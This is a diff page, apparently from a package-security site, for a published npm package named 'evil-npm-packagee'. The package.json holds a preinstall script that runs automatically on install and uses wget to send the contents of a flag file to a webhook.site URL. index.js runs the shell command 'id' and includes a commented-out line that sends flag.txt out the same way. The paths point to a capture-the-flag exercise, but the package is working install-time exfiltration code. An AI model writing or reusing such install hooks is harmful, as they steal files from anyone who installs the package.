evil-npm-packagee 1.0.3

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of evil-npm-packagee might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +7 -0
  2. package/package.json +19 -0
package/index.js ADDED
@@ -0,0 +1,7 @@
1
+ #!/usr/bin/env node
2
+
3
+ const { execSync } = require("node:child_process");
4
+ console.log(execSync("id").toString());
5
+
6
+ // const { exec } = require("node:child_process");
7
+ // exec("wget https://webhook.site/4755bbda-70d7-4f35-a2ff-0ca70f7d5e6b/?flag=$(cat flag.txt)");
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "evil-npm-packagee",
3
+ "scripts": {
4
+ "preinstall": "wget https://webhook.site/4755bbda-70d7-4f35-a2ff-0ca70f7d5e6b/?flag=$(cat /home/ctf/nako3ndbox/flag.txt)"
5
+ },
6
+ "bin": "index.js",
7
+ "version": "1.0.3",
8
+ "description": "",
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/zeosutt/evil-npm-package.git"
12
+ },
13
+ "author": "zeosutt",
14
+ "license": "ISC",
15
+ "bugs": {
16
+ "url": "https://github.com/zeosutt/evil-npm-package/issues"
17
+ },
18
+ "homepage": "https://github.com/zeosutt/evil-npm-package#readme"
19
+ }